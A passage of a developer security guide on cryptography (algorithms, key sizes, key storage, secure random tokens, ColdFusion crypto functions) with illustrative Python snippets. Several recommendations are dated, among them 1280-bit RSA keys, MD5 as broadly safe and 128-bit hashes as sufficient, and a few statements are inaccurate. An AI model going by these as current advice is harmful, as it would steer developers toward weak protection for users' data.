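message = b"balance=1000&account=42"  # hypothetical payload

tag = make_checksum(key, message)

# The receiver recomputes the tag; compare_digest avoids timing leaks.
assert hmac.compare_digest(tag, make_checksum(key, message))

# Any alteration of the data changes the checksum, so tampering is detected.
tampered = b"balance=9000&account=42"
assert not hmac.compare_digest(tag, make_checksum(key, tampered))
```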
&lt;br /&gt;
==Cryptographic Algorithms ==&lt;br /&gt;
&lt;br /&gt;
Various types of cryptographic systems exist that have different strengths and weaknesses. Typically, they are divided into two classes: those that are strong but slow to run, and those that are quick but less secure. Most often a combination of the two approaches is used (e.g., SSL), whereby the connection is established with a strong but slow algorithm, and then, if successful, the actual transmission is encrypted with a weaker but much faster algorithm.&lt;br /&gt;
&lt;br /&gt;
===Symmetric Cryptography ===&lt;br /&gt;
&lt;br /&gt;
Symmetric Cryptography is the most traditional form of cryptography.  In a symmetric cryptosystem, the involved parties share a common secret (password, pass phrase, or key). Data is encrypted and decrypted using the same key. These algorithms tend to be comparatively fast, but they cannot be used unless the involved parties have already exchanged keys.  Any party possessing a specific key can create encrypted messages using that key as well as decrypt any messages encrypted with the key.  In systems involving a number of users who each need to set up independent, secure communication channels symmetric cryptosystems can have practical limitations due to the requirement to securely distribute and manage large numbers of keys.&lt;br /&gt;
&lt;br /&gt;
Common examples of symmetric algorithms are DES, 3DES and AES. The 56-bit keys used in DES are short enough to be easily brute-forced by modern hardware, and DES should no longer be used. Triple DES (or 3DES) applies the same algorithm three times with different keys, giving it a key length of 168 bits (and an effective strength of about 112 bits). Due to the weaknesses of the DES algorithm, the United States National Institute of Standards and Technology (NIST) hosted a selection process for a new algorithm. The winning algorithm was Rijndael, and the associated cryptosystem is now known as the Advanced Encryption Standard, or AES. 3DES is acceptably secure at the current time, but for most new applications it is advisable to use AES.&lt;br /&gt;
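&lt;br /&gt;
The defining property of a symmetric cryptosystem, that one shared key both encrypts and decrypts, can be sketched with a deliberately toy XOR cipher in Python (illustration only; real applications should use AES through a vetted library, never a hand-rolled cipher):&lt;br /&gt;
&lt;br /&gt;
```python
import secrets

def xor_cipher(key: bytes, data: bytes) -> bytes:
    """Toy symmetric cipher: XOR with a key as long as the data.
    Demonstrates the shared-key property only; NOT for real use."""
    return bytes(k ^ d for k, d in zip(key, data))

plaintext = b"attack at dawn"
key = secrets.token_bytes(len(plaintext))  # shared secret, exchanged in advance

ciphertext = xor_cipher(key, plaintext)    # sender encrypts...
recovered = xor_cipher(key, ciphertext)    # ...receiver decrypts with the SAME key

assert recovered == plaintext
```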
&lt;br /&gt;
===Asymmetric Cryptography (also called Public/Private Key Cryptography) ===&lt;br /&gt;
&lt;br /&gt;
Asymmetric algorithms use a pair of keys: data encrypted with one key can be decrypted only with the other. These inter-dependent keys are generated together. One is labeled the Public Key and is distributed freely. The other is labeled the Private Key and must be kept hidden.&lt;br /&gt;
&lt;br /&gt;
Often referred to as Public/Private Key Cryptography, these cryptosystems can provide a number of different functions depending on how they are used. &lt;br /&gt;
&lt;br /&gt;
The most common usage of asymmetric cryptography is to send messages with a guarantee of confidentiality.  If User A wanted to send a message to User B, User A would get access to User B’s publicly-available Public Key.  The message is then encrypted with this key and sent to User B.  Because of the cryptosystem’s property that messages encoded with the Public Key of User B can only be decrypted with User B’s Private Key, only User B can read the message.&lt;br /&gt;
&lt;br /&gt;
Another usage scenario is one where User A wants to send User B a message and wants User B to have a guarantee that the message was sent by User A.  In order to accomplish this, User A would encrypt the message with their Private Key.  The message can then only be decrypted using User A’s Public Key.  This guarantees that User A created the message, because User A is the only entity with access to the Private Key required to create a message that can be decrypted by User A’s Public Key.  This is essentially a digital signature guaranteeing that the message was created by User A.&lt;br /&gt;
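&lt;br /&gt;
Both usages rest on the same mathematical relationship between the two keys. The relationship can be demonstrated with textbook RSA using tiny primes (a toy for illustration only; real systems use 2048-bit keys, padding, and a vetted library, and sign a hash of the message rather than the message itself):&lt;br /&gt;
&lt;br /&gt;
```python
# Toy RSA with tiny primes to show the public/private key relationship.
p, q = 61, 53
n = p * q                   # modulus, part of both keys
phi = (p - 1) * (q - 1)
e = 17                      # public exponent
d = pow(e, -1, phi)         # private exponent (modular inverse of e)

message = 65                # a message encoded as a number smaller than n

# Confidentiality: encrypt with B's PUBLIC key; only B's PRIVATE key decrypts.
ciphertext = pow(message, e, n)
assert pow(ciphertext, d, n) == message

# Signature: "encrypt" with A's PRIVATE key; anyone verifies with A's PUBLIC key.
signature = pow(message, d, n)
assert pow(signature, e, n) == message
```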
&lt;br /&gt;
A Certificate Authority (CA), whose public certificates are installed with browsers or otherwise commonly available, may also digitally sign public keys or certificates. We can authenticate remote systems or users via a mutual trust of an issuing CA. We trust their ‘root’ certificates, which in turn authenticate the public certificate presented by the server.&lt;br /&gt;
&lt;br /&gt;
PGP and SSL are prime examples of systems implementing asymmetric cryptography, using RSA or other algorithms.&lt;br /&gt;
&lt;br /&gt;
===Hashes ===&lt;br /&gt;
&lt;br /&gt;
Hash functions take some data of an arbitrary length (and possibly a key or password) and generate a fixed-length hash based on this input. Hash functions used in cryptography have the property that it is easy to calculate the hash, but difficult or impossible to re-generate the original input if only the hash value is known.  In addition, hash functions useful for cryptography  have the property that it is difficult to craft an initial input such that the hash will match a specific desired value.&lt;br /&gt;
&lt;br /&gt;
MD5 and SHA-1 are common hashing algorithms used today. These algorithms are considered weak (see below) and are likely to be replaced after a process similar to the AES selection. New applications should consider using SHA-256 instead of these weaker algorithms.&lt;br /&gt;
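&lt;br /&gt;
The digest sizes and the fixed-length, one-way behaviour described above can be seen with Python's hashlib (shown here as one convenient stand-in for the hash implementations available on any platform):&lt;br /&gt;
&lt;br /&gt;
```python
import hashlib

data = b"important document"

md5 = hashlib.md5(data).hexdigest()        # 128-bit digest; avoid for new designs
sha1 = hashlib.sha1(data).hexdigest()      # 160-bit digest; being phased out
sha256 = hashlib.sha256(data).hexdigest()  # 256-bit digest; preferred

# Fixed output length regardless of input size (lengths here are hex characters).
assert len(md5) == 32      # 128 bits
assert len(sha1) == 40     # 160 bits
assert len(sha256) == 64   # 256 bits

# A small change in the input yields a completely different digest.
assert hashlib.sha256(b"important document!").hexdigest() != sha256
```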
&lt;br /&gt;
===Key Exchange Algorithms ===&lt;br /&gt;
&lt;br /&gt;
Lastly, we have key exchange algorithms (such as Diffie-Hellman for SSL). These allow us to safely exchange encryption keys with an unknown party. &lt;br /&gt;
&lt;br /&gt;
==Algorithm Selection ==&lt;br /&gt;
&lt;br /&gt;
Modern cryptography relies on being computationally expensive to break, so specific standards can be set for key sizes that provide assurance that, with today’s technology and understanding, it will take too long to decrypt a message by attempting all possible keys.&lt;br /&gt;
&lt;br /&gt;
Therefore, we need to ensure that both the algorithm and the key size are taken into account when selecting an algorithm.&lt;br /&gt;
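&lt;br /&gt;
A back-of-the-envelope calculation shows why key size matters so much: each extra bit doubles the key space. The attack rate below is an assumed figure purely for illustration:&lt;br /&gt;
&lt;br /&gt;
```python
# Rough brute-force cost: time to try every key at an assumed rate.
ATTEMPTS_PER_SECOND = 1e12        # hypothetical well-funded attacker
SECONDS_PER_YEAR = 31_557_600

def years_to_exhaust(key_bits: int) -> float:
    """Years needed to try all 2**key_bits keys at the assumed rate."""
    return (2 ** key_bits) / ATTEMPTS_PER_SECOND / SECONDS_PER_YEAR

assert years_to_exhaust(56) < 1        # DES: exhausted in well under a year
assert years_to_exhaust(128) > 1e18    # AES-128: far beyond any feasible effort
```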
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Proprietary encryption algorithms are not to be trusted as they typically rely on ‘security through obscurity’ and not sound mathematics. These algorithms should be avoided if possible.&lt;br /&gt;
&lt;br /&gt;
Specific algorithms to avoid:&lt;br /&gt;
&lt;br /&gt;
* MD5 has recently been found less secure than previously thought. While still safe for most applications such as hashes for binaries made available publicly, secure applications should now be migrating away from this algorithm.&lt;br /&gt;
&lt;br /&gt;
* SHA-0 has been conclusively broken. It should no longer be used for any sensitive applications.&lt;br /&gt;
&lt;br /&gt;
* SHA-1 has been reduced in strength and we encourage a migration to SHA-256, which implements a larger key size.&lt;br /&gt;
&lt;br /&gt;
* DES was once the standard crypto algorithm for encryption; a normal desktop machine can now break it. AES is the current preferred symmetric algorithm.&lt;br /&gt;
&lt;br /&gt;
Cryptography is a constantly changing field. As new discoveries in cryptanalysis are made, older algorithms will be found unsafe. In addition, as computing power increases, brute force attacks will render other cryptosystems, or the use of certain key lengths, unsafe. Standards bodies such as NIST should be monitored for future recommendations. &lt;br /&gt;
&lt;br /&gt;
Specific applications, such as banking transaction systems, may have specific requirements for algorithms and key sizes.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
Assuming you have chosen an open, standard algorithm, the following recommendations should be considered when reviewing algorithms:&lt;br /&gt;
&lt;br /&gt;
'''Symmetric:'''&lt;br /&gt;
&lt;br /&gt;
* Key sizes of 128 bits (standard for SSL) are sufficient for most applications&lt;br /&gt;
&lt;br /&gt;
* Consider 168 or 256 bits for secure systems such as large financial transactions&lt;br /&gt;
&lt;br /&gt;
'''Asymmetric:'''&lt;br /&gt;
&lt;br /&gt;
The difficulty of cracking a 2048-bit key compared to a 1024-bit key is far more than the factor of two you might expect. Don’t use excessive key sizes unless you know you need them. Bruce Schneier in 2002 (see the references section) recommended the following key lengths for circa 2005 threats:&lt;br /&gt;
&lt;br /&gt;
* Key sizes of 1280 bits are sufficient for most personal applications&lt;br /&gt;
&lt;br /&gt;
* 1536 bits should be acceptable today for most secure applications&lt;br /&gt;
&lt;br /&gt;
* 2048 bits should be considered for highly protected applications.&lt;br /&gt;
&lt;br /&gt;
'''Hashes:'''&lt;br /&gt;
&lt;br /&gt;
* Hash sizes of 128 bits (standard for SSL) are sufficient for most applications&lt;br /&gt;
&lt;br /&gt;
* Consider 168 or 256 bits for secure systems, as many hash functions are currently being revised (see above).&lt;br /&gt;
&lt;br /&gt;
NIST and other standards bodies will provide up to date guidance on suggested key sizes.&lt;br /&gt;
&lt;br /&gt;
'''Design your application to cope with new hashes and algorithms'''&lt;br /&gt;
&lt;br /&gt;
==Key Storage ==&lt;br /&gt;
&lt;br /&gt;
As highlighted above, crypto relies on keys to assure a user’s identity, provide confidentiality and integrity as well as non-repudiation. It is vital that the keys are adequately protected. Should a key be compromised, it can no longer be trusted.&lt;br /&gt;
&lt;br /&gt;
Any system that has been compromised in any way should have all its cryptographic keys replaced. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Unless you are using hardware cryptographic devices, your keys will most likely be stored as binary files on the system providing the encryption. &lt;br /&gt;
&lt;br /&gt;
Can you export the private key or certificate from the store? &lt;br /&gt;
&lt;br /&gt;
* Are any private keys or certificate import files (usually in PKCS#12 format) on the file system? Can they be imported without a password?&lt;br /&gt;
&lt;br /&gt;
* Keys are often stored in code. This is a bad idea, as it means you will not be able to easily replace keys should they become compromised.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Cryptographic keys should be protected as much as is possible with file system permissions. They should be read only and only the application or user directly accessing them should have these rights.&lt;br /&gt;
&lt;br /&gt;
* Private keys should be marked as not exportable when generating the certificate signing request. &lt;br /&gt;
&lt;br /&gt;
* Once imported into the key store (CryptoAPI, Certificates snap-in, Java Key Store, etc.), the private certificate import file obtained from the certificate provider should be securely deleted from front-end systems and kept in a physical safe until required (for example, when installing or replacing a front-end server).&lt;br /&gt;
&lt;br /&gt;
* Host based intrusion systems should be deployed to monitor access of keys. At the very least, changes in keys should be monitored.&lt;br /&gt;
&lt;br /&gt;
* Applications should log any changes to keys. &lt;br /&gt;
&lt;br /&gt;
* Pass phrases used to protect keys should be stored in physically secure places; in some environments, it may be necessary to split the pass phrase or password into two components such that two people will be required to authorize access to the key. These physical, manual processes should be tightly monitored and controlled.&lt;br /&gt;
&lt;br /&gt;
* Storage of keys within source code or binaries should be avoided. This not only has consequences if developers have access to source code, but key management will be almost impossible.&lt;br /&gt;
&lt;br /&gt;
* In a typical web environment, web servers themselves will need permission to access the key. This has obvious implications that other web processes or malicious code may also have access to the key. In these cases, it is vital to minimize the functionality of the system and application requiring access to the keys.&lt;br /&gt;
&lt;br /&gt;
* For interactive applications, a sufficient safeguard is to use a pass phrase or password to encrypt the key when stored on disk. This requires the user to supply a password on startup, but means the key can safely be stored in cases where other users may have greater file system privileges.&lt;br /&gt;
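&lt;br /&gt;
The pass-phrase approach in the last point is usually implemented with a key derivation function such as PBKDF2, sketched here with Python's standard library (the pass phrase and parameters are illustrative assumptions):&lt;br /&gt;
&lt;br /&gt;
```python
import hashlib
import secrets

def derive_key(passphrase: str, salt: bytes, iterations: int = 100_000) -> bytes:
    """Derive a 256-bit key from a pass phrase using PBKDF2-HMAC-SHA256.
    The derived key can then encrypt the stored private key on disk."""
    return hashlib.pbkdf2_hmac("sha256", passphrase.encode(), salt, iterations)

salt = secrets.token_bytes(16)  # random; stored alongside the encrypted key file

key = derive_key("correct horse battery staple", salt)

assert len(key) == 32                                           # 256 bits
assert derive_key("correct horse battery staple", salt) == key  # reproducible
assert derive_key("wrong passphrase", salt) != key
```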
&lt;br /&gt;
Storage of keys in hardware crypto devices is beyond the scope of this document. If you require this level of security, you should really be consulting with crypto specialists.&lt;br /&gt;
&lt;br /&gt;
==Insecure transmission of secrets ==&lt;br /&gt;
&lt;br /&gt;
In security, we assess the level of trust we have in information. When applied to transmission of sensitive data, we need to ensure that encryption occurs before we transmit the data onto any untrusted network. &lt;br /&gt;
&lt;br /&gt;
In practical terms, this means we should aim to encrypt as close to the source of the data as possible.&lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
This can be extremely difficult without expert help. We can try to at least eliminate the most common problems:&lt;br /&gt;
&lt;br /&gt;
* The encryption algorithm or protocol needs to be adequate to the task. The above discussion on weak algorithms and weak keys should be a good starting point.&lt;br /&gt;
&lt;br /&gt;
* We must ensure that through all paths of the transmission we apply this level of encryption.&lt;br /&gt;
&lt;br /&gt;
* Extreme care needs to be taken at the point of encryption and decryption. If your encryption library needs to use temporary files, are these adequately protected? &lt;br /&gt;
&lt;br /&gt;
* Are keys stored securely? Is an unsecured file left behind after it has been encrypted?&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
We have the possibility to encrypt or otherwise protect data at different levels. Choosing the right place for this to occur can involve looking at both security as well as resource requirements. &lt;br /&gt;
&lt;br /&gt;
'''Application''': at this level, the actual application performs the encryption or other crypto function. This is the most desirable, but can place additional strain on resources and create unmanageable complexity. Encryption would typically be performed through an API such as the OpenSSL toolkit (www.openssl.org) or operating system provided crypto functions.&lt;br /&gt;
&lt;br /&gt;
An example would be an S/MIME encrypted email, which is transmitted as encoded text within a standard email. No changes to intermediate email hosts are necessary to transmit the message because we do not require a change to the protocol itself.&lt;br /&gt;
&lt;br /&gt;
'''Protocol''': at this layer, the protocol provides the encryption service. Most commonly, this is seen in HTTPS, using SSL encryption to protect sensitive web traffic. The application no longer needs to implement secure connectivity. However, this does not mean the application has a free ride. SSL requires careful attention when used for mutual (client-side) authentication, as there are two different session keys, one for each direction. Each should be verified before transmitting sensitive data.&lt;br /&gt;
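&lt;br /&gt;
When an application consumes a protocol-level service such as SSL/TLS, its remaining responsibility is to insist on certificate and hostname verification. A minimal sketch with Python's ssl module shows the verified-by-default configuration (and, commented out, the misconfiguration to avoid):&lt;br /&gt;
&lt;br /&gt;
```python
import ssl

# A default client context enables certificate and hostname verification,
# which is exactly the checking the text says must happen before
# transmitting sensitive data.
context = ssl.create_default_context()

assert context.verify_mode == ssl.CERT_REQUIRED
assert context.check_hostname is True

# Never do this in production; it silently disables server authentication:
# context.check_hostname = False
# context.verify_mode = ssl.CERT_NONE
```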
&lt;br /&gt;
Attackers and penetration testers love SSL to hide malicious requests (such as injection attacks for example). Content scanners are most likely unable to decode the SSL connection, letting it pass to the vulnerable web server.&lt;br /&gt;
&lt;br /&gt;
'''Network''': below the protocol layer, we can use technologies such as Virtual Private Networks (VPN) to protect data. This has many incarnations, the most popular being IPsec (Internet Protocol Security), typically implemented as a protected ‘tunnel’ between two gateway routers. Neither the application nor the protocol needs to be crypto aware – all traffic is encrypted regardless.&lt;br /&gt;
&lt;br /&gt;
Possible issues at this level are computational and bandwidth overheads on network devices.&lt;br /&gt;
&lt;br /&gt;
==Reversible Authentication Tokens ==&lt;br /&gt;
&lt;br /&gt;
Today’s web servers typically deal with large numbers of users. Differentiating between them is often done through cookies or other session identifiers. If these session identifiers use a predictable sequence, an attacker need only generate a value in the sequence in order to present a seemingly valid session token.&lt;br /&gt;
&lt;br /&gt;
This can occur at a number of places; the network level for TCP sequence numbers, or right through to the application layer with cookies used as authenticating tokens.&lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Any deterministic sequence generator is likely to be vulnerable.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
The only way to generate secure authentication tokens is to ensure there is no way to predict their sequence. In other words: true random numbers.&lt;br /&gt;
&lt;br /&gt;
It could be argued that computers cannot generate true random numbers, but techniques such as reading mouse movements and keystrokes to gather entropy have significantly increased the randomness of random number generators. It is critical that you do not try to implement this on your own; use of existing, proven implementations is highly desirable.&lt;br /&gt;
&lt;br /&gt;
Most operating systems include functions to generate random numbers that can be called from almost any programming language.&lt;br /&gt;
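&lt;br /&gt;
For example, in Python the secrets module draws from the operating system's CSPRNG and is the appropriate source for session tokens (unlike the general-purpose random module, which is deterministic and predictable):&lt;br /&gt;
&lt;br /&gt;
```python
import secrets

# Unpredictable session token backed by the OS CSPRNG.
token = secrets.token_urlsafe(32)  # 32 bytes of entropy, URL-safe text

assert len(token) >= 40            # 32 bytes base64-encode to 43 characters
assert token != secrets.token_urlsafe(32)  # practically never collides
```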
&lt;br /&gt;
'''Windows &amp;amp; .NET:''' On Microsoft platforms including .NET, it is recommended to use the inbuilt CryptGenRandom function (&amp;lt;u&amp;gt;http://msdn.microsoft.com/library/default.asp?url=/library/en-us/seccrypto/security/cryptgenrandom.asp&amp;lt;/u&amp;gt;).&lt;br /&gt;
&lt;br /&gt;
'''Unix:''' For all Unix based platforms, OpenSSL is an excellent option (&amp;lt;u&amp;gt;http://www.openssl.org/&amp;lt;/u&amp;gt;). It features tools and API functions to generate random numbers. On some platforms, /dev/urandom is a suitable source of pseudo-random entropy.&lt;br /&gt;
&lt;br /&gt;
'''PHP:'''  mt_rand() uses a Mersenne Twister, but is nowhere near as good as CryptoAPI’s secure random number generation options, OpenSSL, or /dev/urandom which is available on many Unix variants. mt_rand() has been noted to produce the same number on some platforms – test prior to deployment. '''Do not use rand() as it is very weak.'''&lt;br /&gt;
&lt;br /&gt;
'''Java:''' java.security.SecureRandom within the Java Cryptography Extension (JCE) provides secure random numbers. This should be used in preference to other random number generators.&lt;br /&gt;
&lt;br /&gt;
'''ColdFusion:''' ColdFusion MX 7 leverages the JCE java.security.SecureRandom class of the underlying JVM as its pseudo-random number generator (PRNG).&lt;br /&gt;
&lt;br /&gt;
==Safe UUID generation ==&lt;br /&gt;
&lt;br /&gt;
UUIDs (such as GUIDs and so on) are only unique if you generate them yourself. This seems relatively straightforward; however, many code snippets available online contain existing UUIDs. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
# Determine the source of your existing UUIDs &lt;br /&gt;
## Did they come from MSDN?&lt;br /&gt;
## Or from an example found on the Internet? &lt;br /&gt;
# Use your favorite search engine to find out&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Do not cut and paste UUIDs and GUIDs from anything other than the UUIDGEN program or from the UuidCreate() API&lt;br /&gt;
&lt;br /&gt;
* Generate fresh UUIDs or GUIDs for each new program &lt;br /&gt;
&lt;br /&gt;
==Summary ==&lt;br /&gt;
&lt;br /&gt;
Cryptography is one of the pillars of information security. Its use has exploded due to the Internet, and it is now included in most areas of computing. Crypto can be used for:&lt;br /&gt;
&lt;br /&gt;
* Remote access such as IPsec VPN&lt;br /&gt;
&lt;br /&gt;
* Certificate based authentication&lt;br /&gt;
&lt;br /&gt;
* Securing confidential or sensitive information&lt;br /&gt;
&lt;br /&gt;
* Obtaining non-repudiation using digital certificates&lt;br /&gt;
&lt;br /&gt;
* Online orders and payments&lt;br /&gt;
&lt;br /&gt;
* Email and messaging security such as S/MIME&lt;br /&gt;
&lt;br /&gt;
A web application can implement cryptography at multiple layers: application, application server or runtime (such as .NET), operating system and hardware. Selecting an optimal approach requires a good understanding of application requirements, the areas of risk, and the level of security strength it might require, flexibility, cost, etc.&lt;br /&gt;
&lt;br /&gt;
Although cryptography is not a panacea, the majority of security breaches do not come from brute force computation but from exploiting mistakes in implementation. The strength of a cryptographic system is often measured by its key length, yet using a large key and then storing the unprotected keys on the same server eliminates most of the protection gained. Besides insecure storage of keys, another classic mistake is engineering custom cryptographic algorithms (for example, to generate random session IDs). Many web applications have been successfully attacked because the developers thought they could create their own crypto functions. &lt;br /&gt;
&lt;br /&gt;
Our recommendation is to use proven products, tools, or packages rather than rolling your own.&lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* Wu, H., ''Misuse of stream ciphers in Word and Excel''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://eprint.iacr.org/2005/007.pdf&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Bindview, ''Vulnerability in Windows NT's SYSKEY encryption'' &lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.bindview.com/Services/razor/Advisories/1999/adv_WinNT_syskey.cfm&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Schneier, B., ''Is 1024 bits enough?'', April 2002 Cryptogram&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.schneier.com/crypto-gram-0204.html#3&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Schneier, B., Cryptogram, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.counterpane.com/cryptogram.html&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* NIST, Replacing SHA-1 with stronger variants: SHA-256/512&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://csrc.nist.gov/CryptoToolkit/tkhash.html&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://csrc.nist.gov/CryptoToolkit/tkencryption.html&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* UUIDs are only unique if you generate them:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://blogs.msdn.com/larryosterman/archive/2005/07/21/441417.aspx&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Cryptographically Secure Random Numbers on Win32:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://blogs.msdn.com/michael_howard/archive/2005/01/14/353379.aspx&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Cryptography ==&lt;br /&gt;
&lt;br /&gt;
The following section describes ColdFusion’s cryptography features. ColdFusion MX leverages the Java Cryptography Extension (JCE) of the underlying J2EE platform for cryptography and random number generation. It provides functions for symmetric (or secret-key) encryption. While it does not provide native functionality for public-key (asymmetric) encryption, it does use the Java Secure Socket Extension (JSSE) for SSL communication.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Pseudo-Random Number Generation'''&lt;br /&gt;
&lt;br /&gt;
ColdFusion provides three functions for random number generation: rand(), randomize(), and randRange(). Function descriptions and syntax:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Rand''' – Use to generate a pseudo-random number&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''	rand([algorithm])'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Randomize''' – Use to seed the pseudo-random number generator (PRNG) with an integer.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''	randomize(number [, algorithm])'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''RandRange''' – Use to generate a pseudo-random integer within the range of the specified numbers&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''	randrange(number1, number2 [, algorithm])'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following values are the allowed algorithm parameters:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
CFMX_COMPAT: (default) – Invokes java.util.Random&lt;br /&gt;
&lt;br /&gt;
SHA1PRNG: (recommended) – Invokes java.security.SecureRandom using the Sun Java SHA-1 PRNG algorithm.&lt;br /&gt;
&lt;br /&gt;
IBMSecureRandom: Use on IBM WebSphere, whose JVM does not support the SHA1PRNG algorithm. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Symmetric Encryption'''&lt;br /&gt;
&lt;br /&gt;
ColdFusion MX 7 provides six encryption functions: decrypt(), decryptBinary(), encrypt(), encryptBinary(), generateSecretKey(), and hash(). Function descriptions and syntax:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Decrypt''' – Use to decrypt encrypted strings with specified key, algorithm, encoding, initialization vector or salt, and iterations&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''	decrypt(encrypted_string, key[, algorithm[, encoding[, IVorSalt[, iterations]]]])'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''DecryptBinary''' – Use to decrypt encrypted binary data with specified key, algorithm, initialization vector or salt, and iterations&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''	decryptBinary(bytes, key[, algorithm[, IVorSalt[, iterations]]])'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Encrypt''' – Use to encrypt string using specific algorithm, encoding, initialization vector or salt, and iterations&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''	encrypt(string, key[, algorithm[, encoding[, IVorSalt[, iterations]]]])'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''EncryptBinary''' – Use to encrypt binary data with specified key, algorithm, initialization vector or salt, and iterations&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''	encryptBinary(bytes, key[, algorithm[, IVorSalt[, iterations]]])'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''GenerateSecretKey''' – Use to generate a secure key using the specified algorithm for the encrypt and encryptBinary functions&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''	generateSecretKey(algorithm)'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Hash '''– Use for one-way conversion of a variable-length string to fixed-length string using the specified algorithm and encoding&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''	hash(string[, algorithm[, encoding]] )'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
ColdFusion offers the following default algorithms for these functions:&lt;br /&gt;
&lt;br /&gt;
CFMX_COMPAT: the algorithm used in ColdFusion MX and prior releases. This algorithm is the least secure option (default). &lt;br /&gt;
&lt;br /&gt;
AES: the Advanced Encryption Standard specified by the National Institute of Standards and Technology (NIST) FIPS-197. (recommended)&lt;br /&gt;
&lt;br /&gt;
BLOWFISH: the Blowfish algorithm defined by Bruce Schneier. &lt;br /&gt;
&lt;br /&gt;
DES: the Data Encryption Standard algorithm defined by NIST FIPS-46-3. &lt;br /&gt;
&lt;br /&gt;
DESEDE: the &amp;quot;Triple DES&amp;quot; algorithm defined by NIST FIPS-46-3. &lt;br /&gt;
&lt;br /&gt;
PBEWithMD5AndDES: A password-based version of the DES algorithm which uses an MD5 hash of the specified password as the encryption key &lt;br /&gt;
&lt;br /&gt;
PBEWithMD5AndTripleDES: A password-based version of the DESEDE algorithm which uses an MD5 hash of the specified password as the encryption key&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following algorithms are provided by default for the hash() function. Note that the SHA algorithms used in ColdFusion are NIST FIPS-180-2 compliant:&lt;br /&gt;
&lt;br /&gt;
CFMX_COMPAT: Generates an MD5 hash string identical to that generated by ColdFusion MX and ColdFusion MX 6.1 (default). &lt;br /&gt;
&lt;br /&gt;
MD5: Generates a 128-bit digest.&lt;br /&gt;
&lt;br /&gt;
SHA: Generates a 160-bit digest. (SHA-1)&lt;br /&gt;
&lt;br /&gt;
SHA-256: Generates a 256-bit digest&lt;br /&gt;
&lt;br /&gt;
SHA-384: Generates a 384-bit digest&lt;br /&gt;
&lt;br /&gt;
SHA-512: Generates a 512-bit digest&lt;br /&gt;
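&lt;br /&gt;
The digest sizes listed above can be verified in any environment with standard hash implementations; here Python's hashlib is used as a stand-in for ColdFusion's hash() function (illustration only, not ColdFusion code):&lt;br /&gt;
&lt;br /&gt;
```python
import hashlib

# Digest sizes in bits for the algorithms listed above.
expected_bits = {"md5": 128, "sha1": 160, "sha256": 256,
                 "sha384": 384, "sha512": 512}

for name, bits in expected_bits.items():
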